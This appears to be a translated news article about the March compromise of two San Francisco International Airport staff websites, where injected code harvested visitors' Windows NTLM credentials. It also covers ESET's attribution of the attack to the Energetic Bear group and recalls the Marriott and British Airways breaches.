Compromised two San Francisco airport sites to steal staff passwords, possibly the Russians behind the operation

The direction ofSan Francisco International Airport confirmed that two of its websites were compromised during March in the context of criminal action aimed at stealing passwords and access data of staff and contractors.

The airport confirmed the violation in a release issued on April 7 that the sites SFOConnect.com and SFOConstruction.com they were "cyberattack targets" where hackers "inserted malicious code to steal some users' credentials". These credentials, if used improperly, would allow access to the airport network.

The release also reads: "Users who may have been affected by this attack include those who access sites from a system outside the airport network via Internet Explorer or through a personal Windows-based device, or from a device not managed by the airport. "

The airport took the two websites offline, which we remember are dedicated exclusively to the staff, and ordered an obligatory reset of passwords on 23 March. The sites are now fully operational. Currently not known whether there were additional security measures, such as multi-factor authentication, to prevent a network violation.

An old acquaintance comes back on the scene: DragonFly, now Energetic Bear

The security company ESET he stated that the target of the criminal action would not be the credentials of the two compromised websites, but the Windows credentials of the site visitors. "The aim was to collect visitors' Windows credentials (username / NTLM hash) using an SMB feature and the file: // prefix," says ESET.

NTLM hashes can be easily hacked to obtain a plain text version of a user's Windows password. In this way, with possible access to the internal network of the airport, the criminals could have used the credentials of the employees to spread horizontally on the network and conduct various types of activities, from theft of information to sabotage.

ESET also traces the attacks back to an old acquaintance, a threat actor known as Energetic Bear (but also DragonFly), a group active since 2010 and thought to be in the pay of the Russian government. It is a particularly active collective, which in the last ten years has targeted various realities all over the world, focusing in particular on the energy sector (hence the name) located in the Middle East, the USA and Turkey.

More recently, as also observed by Kaspersky in 2018, Energetic Bear would have changed the type of targets, turning its gaze to companies in the aerospace and aviation sector. And always Kaspersky had noticed how the group had already used the same technique to obtain the NTLM hashes of visitors to a compromised website.

On the hunt for personal data, for targeted malware campaigns and identity theft

What happened unfortunately a fairly widespread practice in the criminal world that operates on the web: in fact, particularly appetizing targets are those that can allow to obtain a large volume of sensitive information of individuals, perhaps even complete with credit card numbers as well as personal and contact data. Large archives of this information can then be resold on the dark web or used to launch targeted malware campaigns or to implement identity theft attempts for various purposes.

To keep on the subject, the case of the Marriott hotel chain that was the victim of an accident that caused the theft of 5 million customers' data is recent. To remain instead in the field of civil aviation it is worth remembering the violation suffered by British Airways in 2018 with the theft of approximately 500 thousand customer credit card numbers. An accident that cost the airline a fine of over 200 million euros – the largest ever imposed in Europe due to a data breach – in compliance with the then new GDPR laws.